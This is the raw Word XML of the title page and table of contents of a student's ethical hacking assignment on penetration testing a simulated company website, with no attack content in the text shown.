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D510A" w14:textId="678CEABE" w:rsidR="00E1416F" w:rsidRPr="00D04F5C" w:rsidRDefault="00C60D92" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc215851832"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E07C530" wp14:editId="4A0F6503">
            <wp:extent cx="2386275" cy="784860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="288565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6599" cy="794834"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="134194FE" w14:textId="77777777" w:rsidR="003C1EBA" w:rsidRDefault="003C1EBA" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A112CC" w14:textId="0DC9D6C9" w:rsidR="00E1416F" w:rsidRPr="00D04F5C" w:rsidRDefault="00E1416F" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D04F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>RESEARCH INTO CYBER SECURITY ATTACKS AND PENETRATION TESTING FOR A VIRTUALI</w:t>
      </w:r>
      <w:r w:rsidR="00D04F5C" w:rsidRPr="00D04F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D04F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>E SIMULATED COMPANY WEBSITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155AF92C" w14:textId="438AA640" w:rsidR="003C1EBA"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Program: </w:t>
      </w:r>
      <w:r w:rsidR="00E1416F" w:rsidRPr="00D04F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cybersecurity and Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0353DEF5" w14:textId="745B1E77" w:rsidR="00C60D92"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Module: Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C239D20" w14:textId="6208A376" w:rsidR="00C60D92"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Module Code: ACCA7033</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C2D7B" w14:textId="18F38ADA" w:rsidR="00C60D92"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Lecturer: Dr. Mohamed Ghanem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77684810" w14:textId="524B9EDA" w:rsidR="00C60D92"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Name: Sohanur Rahman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035001E" w14:textId="3B9C3C35" w:rsidR="00C60D92" w:rsidRDefault="00C60D92" w:rsidP="00C60D92">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Student ID: 2434329</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10D985" w14:textId="77777777" w:rsidR="003C1EBA" w:rsidRDefault="003C1EBA" w:rsidP="00C60D92">
      <w:pPr>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br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:id w:val="307298994"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="6FE80B8D" w14:textId="170577FA" w:rsidR="003C1EBA" w:rsidRPr="003D06AB" w:rsidRDefault="003C1EBA" w:rsidP="00C60D92">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:spacing w:line="480" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i/>
              <w:iCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="003D06AB">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i/>
              <w:iCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="502EC6CB" w14:textId="163AFBAC" w:rsidR="0005307B" w:rsidRPr="0005307B" w:rsidRDefault="003C1EBA" w:rsidP="00C60D92">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0005307B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="0005307B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="0005307B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc216881394" w:history="1">
            <w:r w:rsidR="0005307B" w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PART 1 — STRATEGIC THREAT ANALYSIS</w:t>
            </w:r>
            <w:r w:rsidR="0005307B" w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0005307B" w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0005307B" w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc216881394 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0005307B" w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0005307B"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w:t>
            </w:r>
            <w:r w:rsidR="0005307B" w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D8D2B58" w14:textId="3B31F60E"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395" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>I. Introduction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_Toc216881395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w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BC4A164" w14:textId="0F9C680C"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396" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>II.  Overview of the Selected Cyber Attack</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_Toc216881396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w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61704BAC" w14:textId="6163A3EC"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397" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>III. MITRE ATT&amp;CK Mapping</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_Toc216881397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w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C13F73A" w14:textId="29236AB9"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398" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IV.  Root Cause Analysis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_Toc216881398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4</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15003B92" w14:textId="4DD54C0F"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399" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>V. Strategic Defensive Recommendations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_Toc216881399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5</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44FA1F2A" w14:textId="0D357900"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0" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VI. Conclusion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_Toc216881400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6</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A8A60E7" w14:textId="09B538E6" w:rsidR="0005307B" w:rsidRPr="0005307B" w:rsidRDefault="0005307B" w:rsidP="00C60D92">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>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1" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PART 2 — Red Team Engagement: Operation IP Shield</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_Toc216881401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6</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39B4652B" w14:textId="6392F1B4"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2" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>I. Rules of Engagement (RoE)</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_Toc216881402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6</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="589A07FF" w14:textId="6232C36D"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3" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>II. Threat Emulation Plan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_Toc216881403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6</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2831B8A0" w14:textId="16675D6A"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4" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>III. Attack Narrative</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_Toc216881404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9</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="168496B0" w14:textId="76EAAC0D" w:rsidR="0005307B" w:rsidRPr="0005307B" w:rsidRDefault="0005307B" w:rsidP="00C60D92">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>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5" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab Experiment Design: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_Toc216881405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9</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77959921" w14:textId="1B0F2D8B" w:rsidR="0005307B" w:rsidRPr="0005307B" w:rsidRDefault="0005307B" w:rsidP="00C60D92">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>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6" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Evaluation breakdown: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_Toc216881406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11</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="412073DC" w14:textId="1CDCA06E"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7" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IV.  Detection Gap Analysis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_Toc216881407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22</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="150995EB" w14:textId="11239B7C"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8" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>V. Strategic Recommendations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_Toc216881408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23</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BC9076D" w14:textId="78082071"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09" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VI. Cost–Benefit Analysis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_Toc216881409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23</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A2EBD22" w14:textId="0C5412E2" w:rsidR="0005307B" w:rsidRPr="0005307B" w:rsidRDefault="0005307B" w:rsidP="00C60D92">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>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10" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VII.  Conclusion</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_Toc216881410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25</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E1AA7B4" w14:textId="500E2D95" w:rsidR="0005307B" w:rsidRPr="0005307B" w:rsidRDefault="0005307B" w:rsidP="00C60D92">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc216881411" w:history="1">
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>REFERENCES</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc216881411 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C4327F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidRPr="0005307B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3410249F" w14:textId="6FA082DF" w:rsidR="003C1EBA" w:rsidRDefault="003C1EBA" w:rsidP="00C60D92">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r w:rsidRPr="0005307B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7E3E9506" w14:textId="77777777" w:rsidR="00E1416F" w:rsidRPr="00D04F5C" w:rsidRDefault="00E1416F" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
